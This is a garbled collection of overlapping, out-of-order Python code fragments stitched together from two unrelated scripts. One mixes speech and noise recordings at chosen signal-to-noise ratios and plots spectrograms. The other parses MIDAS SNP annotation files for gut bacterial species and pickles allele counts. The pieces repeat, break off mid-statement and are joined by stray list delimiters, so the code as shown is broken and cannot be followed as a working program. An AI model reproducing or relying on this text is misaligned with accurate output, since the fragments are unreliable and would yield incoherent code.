noise_data, -10,", "l2: if handle_method == 'cut': ll = min(l1, l2) x1 = x1[:ll] x2", "= mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312)", "'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data,", "x1[:ll-l1]) if l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm", "max(l1, l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2 <", "return mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data =", "fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311)", "'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect =", "= x1[:ll] x2 = x2[:ll] elif handle_method == 'append': ll = max(l1, l2)", "320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect", "= mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212)", "handle_method == 'append': ll = max(l1, l2) if l1 < ll: x1 =", "norm(x1) / (10.0 ** (0.05 * snr)) mix = x1 + x2 return", "= x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1", "= log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0,", "from matplotlib import pyplot as plt def SNR(x1, x2): from numpy.linalg import norm", "= x2.shape[0] if l1 != l2: if handle_method == 'cut': ll = min(l1,", "x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1 != l2:", "plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning',", "= min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif handle_method == 'append':", "20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32)", "* snr)) mix = x1 + x2 return mix if __name__ == '__main__':", "from numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2,", "'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech =", "as np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor import", "handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0]", "< ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2,", "mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0]", "x2 / norm(x2) * norm(x1) / (10.0 ** (0.05 * snr)) mix =", "noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True)", "import read_sphere_wav from scipy.io import wavfile from feature_extractor import * from matplotlib import", "(0.05 * snr)) mix = x1 + x2 return mix if __name__ ==", "l2 = x2.shape[0] if l1 != l2: if handle_method == 'cut': ll =", "= x2[:ll] elif handle_method == 'append': ll = max(l1, l2) if l1 <", "log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut')", "if l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2", "l1 = x1.shape[0] l2 = x2.shape[0] if l1 != l2: if handle_method ==", "matplotlib import pyplot as plt def SNR(x1, x2): from numpy.linalg import norm return" ]
[ "at given sites from utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils,", "Set up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir", "= float(info_items[5]) # Only look at sites of interest if (contig, location, gene_name)", "('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916),", "'R' # note R was assigned indiscriminately pvalue = float(info_items[5]) # Only look", "(alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map", "# Get all samples within the host desired_samples = [] for subject in", "but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499',", "samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample in", "pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) # Store these", "species, sites in desired_host_species_sites: # Get all samples within the host desired_samples =", "MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired", "= \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) # Store these two", "# Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle", "'59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] #", "for specific samples at specific sites # where sites are provided as (contig,", "for line in snp_alleles_file: items = line.split() # Load information about site info_items", "parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random", "within the host desired_samples = [] for subject in subjects: desired_samples += subject_sample_map[subject].keys()", "\\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\", "Map: site (contig, location, gene_id) -> variant type variant_type_map = {} num_sites_processed =", "\\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] #", "35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L),", "bz2 import numpy import os, sys # Desired samples and sites # sites", "sites in annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k", "===================================================================== # sample -> site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict)", "= [] for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain", "info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization = 'R'", "in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split()", "% (config.data_directory, species_name) # Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort,", "= samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map", "of interest if (contig, location, gene_name) not in desired_sites: continue # Store variant", "of given QP pairs at given sites from utils import sample_utils as su,", "from collections import defaultdict import pickle import bz2 import numpy import os, sys", "np_random, randint import random from collections import defaultdict import pickle import bz2 import", "# Store variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and", "location, gene_id) tuples # TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name,", "bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired sample idxs items =", "[] for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs))", "desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig,", "TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): #", "numpy as np from numpy.random import choice, random as np_random, randint import random", "QP pairs at given sites from utils import sample_utils as su, parse_midas_data, substitution_rates_utils,", "desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split() # Load information", "snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items))", "location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample", "site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file", "\\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\", "desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene = [(contig, location)", "alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location,", "in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele)", "# Process allele information # ===================================================================== # sample -> site -> (ref allele,", "# Loads allele counts for specific samples at specific sites # where sites", "\\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'],", "1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L),", "= items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig,", "parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir,", "import os, sys # Desired samples and sites # sites are given as", "= [] for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs =", "and counts) # for small set of given QP pairs at given sites", "location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites)", "('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])]", "os.system('mkdir -p %s' % pdir) # Store these two dicts for each host-species", "snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample", "small set of given QP pairs at given sites from utils import sample_utils", "contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig, location) not", "= (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things", "\\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\", "for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000))", "defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:]", "allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" %", "= bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired sample idxs items", "% (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load information about site", "# Process annotated_snps information # ===================================================================== # Open post-processed MIDAS output snp_file =", "location, gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name)", "'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I',", "num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() #", "Load information about site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1])", "items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples:", "# Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) #", "sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line", "in snp_alleles_file: items = line.split() # Load information about site info_items = items[0].split(\"|\")", "(ddir) os.system('mkdir -p %s' % pdir) # Store these two dicts for each", "numpy.random import choice, random as np_random, randint import random from collections import defaultdict", "Loads allele counts for specific samples at specific sites # where sites are", "Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts", "for all desired samples for idx in desired_sample_idxs: alt, depth = [float(num) for", "('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32',", "subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory pdir =", "\\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\", "was assigned indiscriminately pvalue = float(info_items[5]) # Only look at sites of interest", "samples at specific sites # where sites are provided as (contig, location, gene_id)", "# Map: sample -> site (contig, location, gene_id) -> allele count allele_counts_map =", "sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map:", "type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and depth counts at", "[] for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites =", "[('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== #", "post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process", "('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283',", "sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load", "samples and sites # sites are given as gene_id, contig, location tuples #", "\\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\", "'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945),", "location, gene_id) -> variant type variant_type_map = {} num_sites_processed = 0 # Loop", "# Loop over sites in annotated_snps.txt file for line in snp_file: if num_sites_processed>0", "('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads", "import choice, random as np_random, randint import random from collections import defaultdict import", "124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L),", "species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r')", "return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map = su.parse_subject_sample_map() #", "info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type", "{} num_sites_processed = 0 # Loop over sites in annotated_snps.txt file for line", "items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== #", "for each host-species pair for subjects, species, sites in desired_host_species_sites: # Get all", "location, gene_name)] = variant_type # Store alt and depth counts at this site", "in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx]", "in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return", "= {} num_sites_processed = 0 # Loop over sites in annotated_snps.txt file for", "allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load", "(contig, location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx]", "items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3]", "prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene = [(contig, location) for contig,", "# Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples", "desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample ->", "location, gene_id) -> allele count allele_counts_map = defaultdict(dict) # Map: site (contig, location,", "pairs at given sites from utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config,", "sites in desired_host_species_sites: # Get all samples within the host desired_samples = []", "not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample =", "# Alternate version without gene names desired_sites_no_gene = [(contig, location) for contig, location,", "not in desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)] = variant_type", "os, sys # Desired samples and sites # sites are given as gene_id,", "'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130',", "snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir,", "gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map,", "('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421',", "pickle very specific information (allele identity and counts) # for small set of", "location) for contig, location, gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\"", "contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization", "dicts for each host-species pair for subjects, species, sites in desired_host_species_sites: # Get", "sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict,", "for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) #", "SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for", "defaultdict import pickle import bz2 import numpy import os, sys # Desired samples", "from numpy.random import choice, random as np_random, randint import random from collections import", "subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id, contig, location in sites:", "('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203),", "1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]),", "# Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items))", "-> allele count allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id) ->", "assigned indiscriminately pvalue = float(info_items[5]) # Only look at sites of interest if", "sites of interest if (contig, location, gene_name) not in desired_sites: continue # Store", "species_name) # Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False)", "[(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'],", "variant type variant_type_map = {} num_sites_processed = 0 # Loop over sites in", "sample -> site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load", "information # ===================================================================== # sample -> site -> (ref allele, alt allele) sample_site_allele_dict", "items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig, location)", "Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples =", "subjects, species, sites in desired_host_species_sites: # Get all samples within the host desired_samples", "# ===================================================================== # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r')", "desired_sample_idxs = [] for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs", "# =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names", "are given as gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites =", "bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614',", "[(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'],", "snps_dir, 'r') # ===================================================================== # Process allele information # ===================================================================== # sample ->", "Script to pickle very specific information (allele identity and counts) # for small", "info_items[3] polarization = 'R' # note R was assigned indiscriminately pvalue = float(info_items[5])", "from utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils", "desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id) ->", "-> variant type variant_type_map = {} num_sites_processed = 0 # Loop over sites", "counts for specific samples at specific sites # where sites are provided as", "if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site", "polarize_by_consensus=False) # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') #", "of desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = []", "all desired samples for idx in desired_sample_idxs: alt, depth = [float(num) for num", "bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = []", "% snps_dir, 'r') # Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:]", "import bz2 import numpy import os, sys # Desired samples and sites #", "randint import random from collections import defaultdict import pickle import bz2 import numpy", "# Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # =====================================================================", "provided as (contig, location, gene_id) tuples # TODO: move to parse_midas_data later #", "allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r')", "long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene: continue for idx", "'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in", "defaultdict(dict) # Map: site (contig, location, gene_id) -> variant type variant_type_map = {}", "[float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt,", "core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import choice, random as np_random,", "import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy", "allele count allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id) -> variant", "-> site (contig, location, gene_id) -> allele count allele_counts_map = defaultdict(dict) # Map:", "+= 1 items = line.split() # Load information about site info_items = items[0].split(\"|\")", "% (ddir) os.system('mkdir -p %s' % pdir) # Store these two dicts for", "+= subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id, contig, location in", "snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1", "counts) # for small set of given QP pairs at given sites from", "dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map,", "snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample", "items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map,", "information (allele identity and counts) # for small set of given QP pairs", "counts at this site for all desired samples for idx in desired_sample_idxs: alt,", "very specific information (allele identity and counts) # for small set of given", "purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file =", "desired_sites_no_gene = [(contig, location) for contig, location, gene_id in desired_sites] # SNPs directory", "variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl'", "R was assigned indiscriminately pvalue = float(info_items[5]) # Only look at sites of", "su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from", "# Script to pickle very specific information (allele identity and counts) # for", "population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open 